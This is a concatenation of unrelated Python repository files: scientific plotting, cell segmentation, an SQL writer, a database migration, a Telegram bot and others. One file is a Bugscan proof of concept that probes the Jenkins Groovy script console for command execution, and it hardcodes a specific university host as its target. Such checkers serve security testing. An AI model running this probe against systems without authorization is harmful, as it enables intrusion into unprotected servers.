spike_times_V3_plot1 = [times_plot1[i] for i in range(1,len(V3_plot1)) if abs(V3_plot1[i]-V3_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V4_plot1 = [times_plot1[i] for i in range(1,len(V4_plot1)) if abs(V4_plot1[i]-V4_plot1[i-1]) > (Vth-Vr)/2]
spike_times_V5_plot1 = [times_plot1[i] for i in range(1,len(V5_plot1)) if abs(V5_plot1[i]-V5_plot1[i-1]) > (Vth-Vr)/2]
for t in spike_times_V1_plot1:
ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[0])
for t in spike_times_V2_plot1:
ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[1])
for t in spike_times_V3_plot1:
ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[2])
for t in spike_times_V4_plot1:
ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[3])
for t in spike_times_V5_plot1:
ax[1].plot([t, t], [Vth, Vth+0.5], alpha=0.75, color=c[4])
ax[1].set_xlabel('Time ($10^{-2}$ seconds)', size=10)
ax[1].set_ylabel('Voltage $V_k, k \in \{1,..,5\}$', size=10)
ax[0].set_ylabel('Current $I$', size=10)
fig.suptitle('Network of 5 electrically coupled neurons, $\\beta=0.1$ and $\gamma=0.1$', size=12)
ax[0].legend()
ax[1].legend(bbox_to_anchor=(1, 1))
plt.savefig('synchrony.svg')
plt.show()
| 2.0625 | 2 |
xml-element-search/search.py | ravenberserk/python-utility-scripts | 0 | 12757415 | <reponame>ravenberserk/python-utility-scripts<filename>xml-element-search/search.py
#!/usr/bin/env python
"""Script que permitira buscar un elemento en un listado de ficheros."""
__author__ = "<NAME>"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
import xml.etree.ElementTree as ET
import glob
def has_attibutes(button):
return 'action' in button.attrib
def search_in_file(tree_root):
list_buttons = []
if tree_root:
for child in tree_root:
if 'commandButton' in child.tag:
if not has_attibutes(child):
list_buttons.append(child)
else:
for grand_child in child.findall('.'):
list_buttons.extend(search_in_file(grand_child))
return list_buttons
def get_files(root_path):
return glob.iglob(root_path + '/**/*.xml', recursive=True)
def main():
list_pages = get_files('source')
dict_buttons = {}
for page in list_pages:
tree = ET.parse(page)
list_buttons = search_in_file(tree.getroot())
if list_buttons:
page_name = page[page.rfind('\\') + 1::]
dict_buttons[page_name] = list_buttons
for key, item in dict_buttons.items():
print('Page: {} - Buttons: {}'.format(key, len(item)))
if __name__ == '__main__':
main()
| 2.8125 | 3 |
hpacellseg/cellsegmentator.py | p4rallax/HPA-Cell-Segmentation | 0 | 12757416 | """Package for loading and running the nuclei and cell segmentation models programmaticly."""
import os
import sys
import cv2
import imageio
import numpy as np
import torch
import torch.nn
import torch.nn.functional as F
from skimage import transform, util
from hpacellseg.constants import (MULTI_CHANNEL_CELL_MODEL_URL,
NUCLEI_MODEL_URL, TWO_CHANNEL_CELL_MODEL_URL)
from hpacellseg.utils import download_with_url
NORMALIZE = {"mean": [124 / 255, 117 / 255, 104 / 255], "std": [1 / (0.0167 * 255)] * 3}
class CellSegmentator(object):
"""Uses pretrained DPN-Unet models to segment cells from images."""
def __init__(
self,
nuclei_model="./nuclei_model.pth",
cell_model="./cell_model.pth",
model_width_height=None,
device="cuda",
multi_channel_model=True,
return_without_scale_restore=False,
scale_factor=0.25,
padding=False
):
if device != "cuda" and device != "cpu" and "cuda" not in device:
raise ValueError(f"{device} is not a valid device (cuda/cpu)")
if device != "cpu":
try:
assert torch.cuda.is_available()
except AssertionError:
print("No GPU found, using CPU.", file=sys.stderr)
device = "cpu"
self.device = device
if isinstance(nuclei_model, str):
if not os.path.exists(nuclei_model):
print(
f"Could not find {nuclei_model}. Downloading it now",
file=sys.stderr,
)
download_with_url(NUCLEI_MODEL_URL, nuclei_model)
nuclei_model = torch.load(
nuclei_model, map_location=torch.device(self.device)
)
if isinstance(nuclei_model, torch.nn.DataParallel) and device == "cpu":
nuclei_model = nuclei_model.module
self.nuclei_model = nuclei_model.to(self.device)
self.multi_channel_model = multi_channel_model
if isinstance(cell_model, str):
if not os.path.exists(cell_model):
print(
f"Could not find {cell_model}. Downloading it now", file=sys.stderr
)
if self.multi_channel_model:
download_with_url(MULTI_CHANNEL_CELL_MODEL_URL, cell_model)
else:
download_with_url(TWO_CHANNEL_CELL_MODEL_URL, cell_model)
cell_model = torch.load(cell_model, map_location=torch.device(self.device))
self.cell_model = cell_model.to(self.device)
self.model_width_height = model_width_height
self.return_without_scale_restore = return_without_scale_restore
self.scale_factor = scale_factor
self.padding = padding
def _image_conversion(self, images):
microtubule_imgs, er_imgs, nuclei_imgs = images
if self.multi_channel_model:
if not isinstance(er_imgs, list):
raise ValueError("Please speicify the image path(s) for er channels!")
else:
if not er_imgs is None:
raise ValueError(
"second channel should be None for two channel model predition!"
)
if not isinstance(microtubule_imgs, list):
raise ValueError("The microtubule images should be a list")
if not isinstance(nuclei_imgs, list):
raise ValueError("The microtubule images should be a list")
if er_imgs:
if not len(microtubule_imgs) == len(er_imgs) == len(nuclei_imgs):
raise ValueError("The lists of images needs to be the same length")
else:
if not len(microtubule_imgs) == len(nuclei_imgs):
raise ValueError("The lists of images needs to be the same length")
if not all(isinstance(item, np.ndarray) for item in microtubule_imgs):
microtubule_imgs = [
os.path.expanduser(item) for _, item in enumerate(microtubule_imgs)
]
nuclei_imgs = [
os.path.expanduser(item) for _, item in enumerate(nuclei_imgs)
]
microtubule_imgs = list(
map(lambda item: imageio.imread(item), microtubule_imgs)
)
nuclei_imgs = list(map(lambda item: imageio.imread(item), nuclei_imgs))
if er_imgs:
er_imgs = [os.path.expanduser(item) for _, item in enumerate(er_imgs)]
er_imgs = list(map(lambda item: imageio.imread(item), er_imgs))
if not er_imgs:
er_imgs = [
np.zeros(item.shape, dtype=item.dtype)
for _, item in enumerate(microtubule_imgs)
]
cell_imgs = list(
map(
lambda item: np.dstack((item[0], item[1], item[2])),
list(zip(microtubule_imgs, er_imgs, nuclei_imgs)),
)
)
return cell_imgs
def _pad(self, image):
rows, cols = image.shape[:2]
self.scaled_shape = rows, cols
img_pad= cv2.copyMakeBorder(
image,
32,
(32 - rows % 32),
32,
(32 - cols % 32),
cv2.BORDER_REFLECT,
)
return img_pad
def pred_nuclei(self, images):
def _preprocess(images):
if isinstance(images[0], str):
raise NotImplementedError('Currently the model requires images as numpy arrays, not paths.')
# images = [imageio.imread(image_path) for image_path in images]
self.target_shapes = [image.shape for image in images]
#print(images.shape)
#resize like in original implementation with https://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.resize
if self.model_width_height:
images = np.array([transform.resize(image, (self.model_width_height,self.model_width_height))
for image in images])
else:
images = [transform.rescale(image, self.scale_factor) for image in images]
if self.padding:
images = [self._pad(image) for image in images]
nuc_images = np.array([np.dstack((image[..., 2], image[..., 2], image[..., 2])) if len(image.shape) >= 3
else np.dstack((image, image, image)) for image in images])
nuc_images = nuc_images.transpose([0, 3, 1, 2])
#print("nuc", nuc_images.shape)
return nuc_images
def _segment_helper(imgs):
with torch.no_grad():
mean = torch.as_tensor(NORMALIZE["mean"], device=self.device)
std = torch.as_tensor(NORMALIZE["std"], device=self.device)
imgs = torch.tensor(imgs).float()
imgs = imgs.to(self.device)
imgs = imgs.sub_(mean[:, None, None]).div_(std[:, None, None])
imgs = self.nuclei_model(imgs)
imgs = F.softmax(imgs, dim=1)
return imgs
preprocessed_imgs = _preprocess(images)
predictions = _segment_helper(preprocessed_imgs)
predictions = predictions.to("cpu").numpy()
#dont restore scaling, just save and scale later ...
predictions = [self._restore_scaling(util.img_as_ubyte(pred), target_shape)
for pred, target_shape in zip(predictions, self.target_shapes)]
return predictions
def _restore_scaling(self, n_prediction, target_shape):
"""Restore an image from scaling and padding.
This method is intended for internal use.
It takes the output from the nuclei model as input.
"""
n_prediction = n_prediction.transpose([1, 2, 0])
if self.padding:
n_prediction = n_prediction[
32 : 32 + self.scaled_shape[0], 32 : 32 + self.scaled_shape[1], ...
]
n_prediction[..., 0] = 0
if not self.return_without_scale_restore:
n_prediction = cv2.resize(
n_prediction,
(target_shape[0], target_shape[1]),
#try INTER_NEAREST_EXACT
interpolation=cv2.INTER_NEAREST_EXACT,
)
return n_prediction
def pred_cells(self, images, precombined=False):
def _preprocess(images):
self.target_shapes = [image.shape for image in images]
for image in images:
if not len(image.shape) == 3:
raise ValueError("image should has 3 channels")
#resize like in original implementation with https://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.resize
if self.model_width_height:
images = np.array([transform.resize(image, (self.model_width_height,self.model_width_height))
for image in images])
else:
images = np.array([transform.rescale(image, self.scale_factor, multichannel=True) for image in images])
if self.padding:
images = np.array([self._pad(image) for image in images])
cell_images = images.transpose([0, 3, 1, 2])
return cell_images
def _segment_helper(imgs):
with torch.no_grad():
mean = torch.as_tensor(NORMALIZE["mean"], device=self.device)
std = torch.as_tensor(NORMALIZE["std"], device=self.device)
imgs = torch.tensor(imgs).float()
imgs = imgs.to(self.device)
imgs = imgs.sub_(mean[:, None, None]).div_(std[:, None, None])
imgs = self.cell_model(imgs)
imgs = F.softmax(imgs, dim=1)
return imgs
if not precombined:
images = self._image_conversion(images)
preprocessed_imgs = _preprocess(images)
predictions = _segment_helper(preprocessed_imgs)
predictions = predictions.to("cpu").numpy()
predictions = [self._restore_scaling(util.img_as_ubyte(pred), target_shape)
for pred, target_shape in zip(predictions, self.target_shapes)]
return predictions | 2.390625 | 2 |
bcbio/illumina/demultiplex.py | matanhofree/bcbio-nextgen | 1 | 12757417 | <filename>bcbio/illumina/demultiplex.py
"""Demultiplex and fastq conversion from Illumina output directories.
Uses Illumina's bcl2fastq: http://support.illumina.com/downloads/bcl2fastq_conversion_software_184.ilmn
"""
import os
import subprocess
import time
from bcbio import utils
def run_bcl2fastq(run_folder, ss_csv, config):
"""Run bcl2fastq for de-multiplexing and fastq generation.
run_folder -- directory of Illumina outputs
ss_csv -- Samplesheet CSV file describing samples.
"""
bc_dir = os.path.join(run_folder, "Data", "Intensities", "BaseCalls")
output_dir = os.path.join(run_folder, "fastq")
if not os.path.exists(output_dir):
subprocess.check_call(["configureBclToFastq.pl", "--no-eamss",
"--input-dir", bc_dir, "--output-dir", output_dir,
"--sample-sheet", ss_csv])
with utils.chdir(output_dir):
cores = str(utils.get_in(config, ("algorithm", "num_cores"), 1))
cmd = ["make", "-j", cores]
if "submit_cmd" in config["process"] and "bcl2fastq_batch" in config["process"]:
_submit_and_wait(cmd, cores, config, output_dir)
else:
subprocess.check_call(cmd)
return output_dir
def _submit_and_wait(cmd, cores, config, output_dir):
"""Submit command with batch script specified in configuration, wait until finished
"""
batch_script = "submit_bcl2fastq.sh"
if not os.path.exists(batch_script + ".finished"):
if os.path.exists(batch_script + ".failed"):
os.remove(batch_script + ".failed")
with open(batch_script, "w") as out_handle:
out_handle.write(config["process"]["bcl2fastq_batch"].format(
cores=cores, bcl2fastq_cmd=" ".join(cmd), batch_script=batch_script))
submit_cmd = utils.get_in(config, ("process", "submit_cmd"))
subprocess.check_call(submit_cmd.format(batch_script=batch_script), shell=True)
# wait until finished or failure checkpoint file
while 1:
if os.path.exists(batch_script + ".finished"):
break
if os.path.exists(batch_script + ".failed"):
raise ValueError("bcl2fastq batch script failed: %s" %
os.path.join(output_dir, batch_script))
time.sleep(5)
| 2.296875 | 2 |
Programas_Capitulo_05/Cap05_pagina_132_bisection_con_for.py | rojassergio/Aprendiendo-a-programar-en-Python-con-mi-computador | 17 | 12757418 | <gh_stars>10-100
'''
@author: <NAME>
@contact: <EMAIL>
--------------------------
Contenido bajo
Atribución-NoComercial-CompartirIgual 3.0 Venezuela (CC BY-NC-SA 3.0 VE)
http://creativecommons.org/licenses/by-nc-sa/3.0/ve/
Creado en abril 21, 2016
'''
def biseccion(f, a, b, tol=1.e-6):
"""
Funcion que implenta el metodo de biseccion usando
la instruccion for para encontrar raices reales de
una funcion.
f: es la funcion a la cual se le determina alguna raiz
a: valor menor del interval
b: valor mayor del intervalo
tol: es la tolerancia
"""
fa = f(a)
if fa*f(b) > 0:
return None, None, None
itera = [0] # variable que acumula las iteraciones
for i in itera:
c = (a + b)*0.5
fmed = f(c)
if abs(b-a) < tol:
return i, c, fmed
if fa*fmed <= 0:
b = c # La raiz esta en el intervalo [a,c]
else:
a = c # La raiz esta en el intervalo [c,b]
fa = fmed
itera.append(i + 1)
itera[i] = None
#print(itera)
def f(x):
"""
Define la funcion para la cual queremos encontrar alguna raiz
"""
return (x**2 + 4.0*x - 4.0) # usar (-6,-4)
tol = 1e-10
a, b = 0, 2 # raiz por buscar
a, b = -6, -4 # raiz en la grafica
iter, x, fx = biseccion(f, a, b, tol)
if x is None:
print('\t f(x) NO cambia signo en el intervalo [{0:g},{1:g}]'.format(a, b))
else:
print('\t En {0:d} iteraciones y con tolerancia de {1:g} la raiz es:'
.format(iter,tol))
print('\t x = {0:g}, generando f({0:g}) = {1:g}'.format(x,fx))
| 3.15625 | 3 |
Bugscan_exploits-master/exp_list/exp-1667.py | csadsl/poc_exp | 11 | 12757419 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : jenkins_script_console_java_execution
Author : fenyouxiangyu
mail : <EMAIL>
Referer : http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
"""
# Description : This module uses the Jenkins Groovy script console to execute OS commands using Java.
# Command : println "netstat -aon".execute().text
import urlparse
def assign(service, arg):
if service == 'jenkins':
return True, arg
def audit(arg):
add_url = 'script/'
url = arg + add_url
payload ='script=println%28Jenkins%29&json=%7B%22script%22%3A+%22println%28Jenkins%29%22%2C+%22%22%3A+%22%22%7D'
code, head, res, errcode, _= curl.curl2(url,payload)
if code == 200 and 'class jenkins.model.Jenkins' in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('jenkins', 'http://sinv-56038.edu.hsr.ch/jenkins/')[1]) | 2.828125 | 3 |
im/ib/ib_sql_writer_backend.py | ajmal017/amp | 0 | 12757420 | import pandas as pd
import psycopg2.extras as pextra
import im.common.data.types as icdtyp
import im.common.sql_writer_backend as icsqlw
class IbSqlWriterBackend(icsqlw.AbstractSqlWriterBackend):
"""
Manager of CRUD operations on a database defined in db.sql.
"""
FREQ_ATTR_MAPPING = {
icdtyp.Frequency.Daily: {
"table_name": "IbDailyData",
"datetime_field_name": "date",
},
icdtyp.Frequency.Minutely: {
"table_name": "IbMinuteData",
"datetime_field_name": "datetime",
},
icdtyp.Frequency.Tick: {
"table_name": "IbTickData",
"datetime_field_name": "datetime",
},
}
def insert_bulk_daily_data(
self,
df: pd.DataFrame,
) -> None:
"""
Insert daily data for a particular TradeSymbol entry in bulk.
:param df: a dataframe from s3
"""
with self.conn:
with self.conn.cursor() as curs:
pextra.execute_values(
curs,
"INSERT INTO IbDailyData "
"(trade_symbol_id, date, open, high, low, close, volume, average, barCount) "
"VALUES %s ON CONFLICT DO NOTHING",
df.to_dict("records"),
template="(%(trade_symbol_id)s, %(date)s, %(open)s,"
" %(high)s, %(low)s, %(close)s, %(volume)s, %(average)s, %(barCount)s)",
)
def insert_daily_data(
self,
trade_symbol_id: int,
date: str,
open_val: float,
high_val: float,
low_val: float,
close_val: float,
volume_val: int,
average_val: float,
bar_count_val: int,
) -> None:
"""
Insert daily data for a particular TradeSymbol entry.
:param trade_symbol_id: id of TradeSymbol
:param date: date string
:param open_val: open price
:param high_val: high price
:param low_val: low price
:param close_val: close price
:param volume_val: volume
:param average_val: average
:param bar_count_val: bar count
"""
with self.conn:
with self.conn.cursor() as curs:
curs.execute(
"INSERT INTO IbDailyData "
"(trade_symbol_id, date, open, high, low, close, volume, average, barCount) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING",
[
trade_symbol_id,
date,
open_val,
high_val,
low_val,
close_val,
volume_val,
average_val,
bar_count_val,
],
)
def insert_bulk_minute_data(
self,
df: pd.DataFrame,
) -> None:
"""
Insert minute data for a particular TradeSymbol entry in bulk.
:param df: a dataframe from s3
"""
with self.conn:
with self.conn.cursor() as curs:
pextra.execute_values(
curs,
"INSERT INTO IbMinuteData "
"(trade_symbol_id, datetime, open, high, low, close, "
"volume, average, barCount) "
"VALUES %s ON CONFLICT DO NOTHING",
df.to_dict("records"),
template="(%(trade_symbol_id)s, %(datetime)s, %(open)s,"
" %(high)s, %(low)s, %(close)s, %(volume)s, %(average)s, %(barCount)s)",
)
def insert_minute_data(
self,
trade_symbol_id: int,
date_time: str,
open_val: float,
high_val: float,
low_val: float,
close_val: float,
volume_val: int,
average_val: float,
bar_count_val: int,
) -> None:
"""
Insert minute data for a particular TradeSymbol entry.
:param trade_symbol_id: id of TradeSymbol
:param date_time: date and time string
:param open_val: open price
:param high_val: high price
:param low_val: low price
:param close_val: close price
:param volume_val: volume
:param average_val: average
:param bar_count_val: bar count
"""
with self.conn:
with self.conn.cursor() as curs:
curs.execute(
"INSERT INTO IbMinuteData "
"(trade_symbol_id, datetime, open, high, low, close, "
"volume, average, barCount) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING",
[
trade_symbol_id,
date_time,
open_val,
high_val,
low_val,
close_val,
volume_val,
average_val,
bar_count_val,
],
)
def insert_tick_data(
self,
trade_symbol_id: int,
date_time: str,
price_val: float,
size_val: int,
) -> None:
"""
Insert tick data for a particular TradeSymbol entry.
:param trade_symbol_id: id of TradeSymbol
:param date_time: date and time string
:param price_val: price of the transaction
:param size_val: size of the transaction
"""
with self.conn:
with self.conn.cursor() as curs:
curs.execute(
"INSERT INTO IbTickData "
"(trade_symbol_id, datetime, price, size) "
"VALUES (%s, %s, %s, %s) ON CONFLICT DO NOTHING",
[
trade_symbol_id,
date_time,
price_val,
size_val,
],
)
| 2.5 | 2 |
tests/test_storm.py | stijnvanhoey/hydropy | 51 | 12757421 | # -*- coding: utf-8 -*-
"""
test_storm.py
"""
from __future__ import absolute_import, print_function
import unittest
from hydropy import storm
class TestStorm(unittest.TestCase):
def test_storm_selectstorm(self):
pass
| 1.398438 | 1 |
TgBot-v2/src/commands/inline_commands.py | cppshizoidS/Python | 5 | 12757422 | from telegram import CallbackQuery
from telegram.error import BadRequest
import utils.utils as utl
import commands.keyboards as kb
def foo_command(query: CallbackQuery):
try:
query.edit_message_text(
utl.prep_for_md("This is *foo*", ignore=['*']),
reply_markup=kb.main_menu,
parse_mode='MarkdownV2')
except BadRequest as e:
print("Bad request")
print(e)
def bar_command(query: CallbackQuery):
try:
query.edit_message_text("This is bar", reply_markup=kb.main_menu)
except BadRequest as e:
print("Bad request")
print(e)
| 2.65625 | 3 |
pyrfr/examples/pyrfr_pickle_example.py | sslavian812/random_forest_run | 0 | 12757423 | import sys
sys.path.append("..")
import os
here = os.path.dirname(os.path.realpath(__file__))
import pickle
import tempfile
import numpy as np
import pyrfr.regression
data_set_prefix = '%(here)s/../test_data_sets/diabetes_' % {"here":here}
features = np.loadtxt(data_set_prefix+'features.csv', delimiter=",")
responses = np.loadtxt(data_set_prefix+'responses.csv', delimiter=",")
data = pyrfr.regression.default_data_container(10)
data.import_csv_files(data_set_prefix+'features.csv', data_set_prefix+'responses.csv')
# create an instance of a regerssion forest using binary splits and the RSS loss
the_forest = pyrfr.regression.binary_rss_forest()
#reset to reseed the rng for the next fit
rng = pyrfr.regression.default_random_engine(42)
# create an instance of a regerssion forest using binary splits and the RSS loss
the_forest = pyrfr.regression.binary_rss_forest()
the_forest.options.num_trees = 16
# the forest's parameters
the_forest.options.compute_oob_error = True
the_forest.options.do_bootstrapping=True # default: false
the_forest.options.num_data_points_per_tree=(data.num_data_points()//4)* 3 # means same number as data points
the_forest.options.tree_opts.max_features = data.num_features()//2 # 0 would mean all the features
the_forest.options.tree_opts.min_samples_to_split = 0 # 0 means split until pure
the_forest.options.tree_opts.min_samples_in_leaf = 0 # 0 means no restriction
the_forest.options.tree_opts.max_depth=1024 # 0 means no restriction
the_forest.options.tree_opts.epsilon_purity = 1e-8 # when checking for purity, the data points can differ by this epsilon
the_forest.fit(data, rng)
predictions_1 = [ the_forest.predict(f.tolist()) for f in features]
with tempfile.NamedTemporaryFile(mode='w+b', delete=False) as f:
fname = f.name
pickle.dump(the_forest, f)
with open(fname, 'r+b') as fh:
a_second_forest = pickle.load(fh)
os.remove(fname)
predictions_2 = [ a_second_forest.predict(f.tolist()) for f in features]
if (np.allclose(predictions_1, predictions_2)):
print("successfully pickled/unpickled the forest")
else:
print("something went wrong")
| 2.609375 | 3 |
spitfire/compiler/scanner.py | StevenLudwig/spitfire | 0 | 12757424 | import yappsrt
import spitfire.compiler.parser
# SpitfireScanner uses the order of the match, not the length of the match to
# determine what token to return. I'm not sure how fragille this is long-term,
# but it seems to have been the right solution for a number of small problems
# allong the way.
_restrict_cache = {}
class SpitfireScanner(spitfire.compiler.parser._SpitfireParserScanner):
def token(self, i, restrict=0):
"""Get the i'th token, and if i is one past the end, then scan
for another token; restrict is a list of tokens that
are allowed, or 0 for any token."""
if i == len(self.tokens):
self.scan(restrict)
if i < len(self.tokens):
# Make sure the restriction is more restricted
restriction = self.restrictions[i]
if restrict and restriction:
if not restriction.issuperset(restrict):
raise NotImplementedError(
"Unimplemented: restriction set changed", restrict, self.restrictions[i])
return self.tokens[i]
elif not restrict and not restriction:
return self.tokens[i]
raise yappsrt.NoMoreTokens(i, len(self.tokens), self.tokens[i], restrict, self.restrictions[i], self.tokens)
def scan(self, restrict):
"""Should scan another token and add it to the list, self.tokens,
and add the restriction to self.restrictions"""
# Cache the list of patterns we check to avoid unnecessary iteration
restrict = frozenset(restrict)
try:
patterns = _restrict_cache[restrict]
except KeyError:
patterns = [pair for pair in self.patterns if not restrict or pair[0] in restrict]
_restrict_cache[restrict] = patterns
_input, _pos = self.input, self.pos
for best_pat, regexp in patterns:
m = regexp.match(_input, _pos)
if m:
tname = m.group(0)
best_match = len(tname)
# msolo: use the first match, not the 'best'
break
else:
# If we didn't find anything, raise an error
msg = "Bad Token"
if restrict:
msg = "Trying to find one of " + ', '.join(restrict)
raise yappsrt.SyntaxError(self.pos, msg)
# Create a token with this data
end = _pos + best_match
token = (_pos, end, best_pat, tname)
self.pos = end
# Only add this token if it's not in the list
# (to prevent looping)
if not self.tokens or token != self.tokens[-1]:
self.tokens.append(token)
self.restrictions.append(restrict)
return
| 2.3125 | 2 |
backend/app/alembic/versions/d11266229bcf_added_role_models_and_organization_model.py | saschajullmann/sedotra | 0 | 12757425 | <filename>backend/app/alembic/versions/d11266229bcf_added_role_models_and_organization_model.py
"""added role models and organization model
Revision ID: <KEY>
Revises: <KEY>
Create Date: 2021-02-16 06:29:37.816314
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('organization',
sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.Column('description', sa.String(), nullable=True),
sa.Column('is_active', sa.Boolean(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_organization_created_at'), 'organization', ['created_at'], unique=False)
op.create_index(op.f('ix_organization_id'), 'organization', ['id'], unique=False)
op.create_index(op.f('ix_organization_name'), 'organization', ['name'], unique=True)
op.create_index(op.f('ix_organization_updated_at'), 'organization', ['updated_at'], unique=False)
op.create_table('organization_roles',
sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.Column('organization_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.ForeignKeyConstraint(['organization_id'], ['organization.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('organization_id', 'user_id')
)
op.create_index(op.f('ix_organization_roles_created_at'), 'organization_roles', ['created_at'], unique=False)
op.create_index(op.f('ix_organization_roles_id'), 'organization_roles', ['id'], unique=False)
op.create_index(op.f('ix_organization_roles_updated_at'), 'organization_roles', ['updated_at'], unique=False)
op.create_table('dataroom_roles',
sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.Column('team_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.Column('dataroom_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.ForeignKeyConstraint(['dataroom_id'], ['dataroom.id'], ),
sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('dataroom_id', 'user_id')
)
op.create_index(op.f('ix_dataroom_roles_created_at'), 'dataroom_roles', ['created_at'], unique=False)
op.create_index(op.f('ix_dataroom_roles_id'), 'dataroom_roles', ['id'], unique=False)
op.create_index(op.f('ix_dataroom_roles_updated_at'), 'dataroom_roles', ['updated_at'], unique=False)
op.create_table('team_roles',
sa.Column('id', postgresql.UUID(as_uuid=True), server_default=sa.text('uuid_generate_v4()'), nullable=False),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.Column('user_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.Column('team_id', postgresql.UUID(as_uuid=True), nullable=True),
sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('team_id', 'user_id')
)
op.create_index(op.f('ix_team_roles_created_at'), 'team_roles', ['created_at'], unique=False)
op.create_index(op.f('ix_team_roles_id'), 'team_roles', ['id'], unique=False)
op.create_index(op.f('ix_team_roles_updated_at'), 'team_roles', ['updated_at'], unique=False)
op.drop_table('team_user')
op.add_column('dataroom', sa.Column('organization_fk', postgresql.UUID(as_uuid=True), nullable=False))
op.drop_constraint('dataroom_team_fk_fkey', 'dataroom', type_='foreignkey')
op.create_foreign_key(None, 'dataroom', 'organization', ['organization_fk'], ['id'])
op.drop_column('dataroom', 'team_fk')
op.add_column('team', sa.Column('organization_fk', postgresql.UUID(as_uuid=True), nullable=False))
op.create_foreign_key(None, 'team', 'organization', ['organization_fk'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'team', type_='foreignkey')
op.drop_column('team', 'organization_fk')
op.add_column('dataroom', sa.Column('team_fk', postgresql.UUID(), autoincrement=False, nullable=False))
op.drop_constraint(None, 'dataroom', type_='foreignkey')
op.create_foreign_key('dataroom_team_fk_fkey', 'dataroom', 'team', ['team_fk'], ['id'])
op.drop_column('dataroom', 'organization_fk')
op.create_table('team_user',
sa.Column('team_fk', postgresql.UUID(), autoincrement=False, nullable=True),
sa.Column('user_fk', postgresql.UUID(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['team_fk'], ['team.id'], name='team_user_team_fk_fkey'),
sa.ForeignKeyConstraint(['user_fk'], ['user.id'], name='team_user_user_fk_fkey')
)
op.drop_index(op.f('ix_team_roles_updated_at'), table_name='team_roles')
op.drop_index(op.f('ix_team_roles_id'), table_name='team_roles')
op.drop_index(op.f('ix_team_roles_created_at'), table_name='team_roles')
op.drop_table('team_roles')
op.drop_index(op.f('ix_dataroom_roles_updated_at'), table_name='dataroom_roles')
op.drop_index(op.f('ix_dataroom_roles_id'), table_name='dataroom_roles')
op.drop_index(op.f('ix_dataroom_roles_created_at'), table_name='dataroom_roles')
op.drop_table('dataroom_roles')
op.drop_index(op.f('ix_organization_roles_updated_at'), table_name='organization_roles')
op.drop_index(op.f('ix_organization_roles_id'), table_name='organization_roles')
op.drop_index(op.f('ix_organization_roles_created_at'), table_name='organization_roles')
op.drop_table('organization_roles')
op.drop_index(op.f('ix_organization_updated_at'), table_name='organization')
op.drop_index(op.f('ix_organization_name'), table_name='organization')
op.drop_index(op.f('ix_organization_id'), table_name='organization')
op.drop_index(op.f('ix_organization_created_at'), table_name='organization')
op.drop_table('organization')
# ### end Alembic commands ###
| 1.75 | 2 |
algosec_resilient/components/algosec_list_associated_applications.py | algosec/algosec-resilient | 1 | 12757426 | <reponame>algosec/algosec-resilient<filename>algosec_resilient/components/algosec_list_associated_applications.py
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import logging
from resilient_circuits import function, FunctionResult, StatusMessage
from algosec_resilient.components.algosec_base_component import AlgoSecComponent
logger = logging.getLogger(__name__)
class AlgoSecListAssociatedApplications(AlgoSecComponent):
"""Component that implements Resilient function 'algosec_list_associated_applications"""
@function("algosec_list_associated_applications")
def _algosec_list_associated_applications_function(self, event, *args, **kwargs):
"""
Function: Given an IP/Host list all associated BusinessFlow applications.
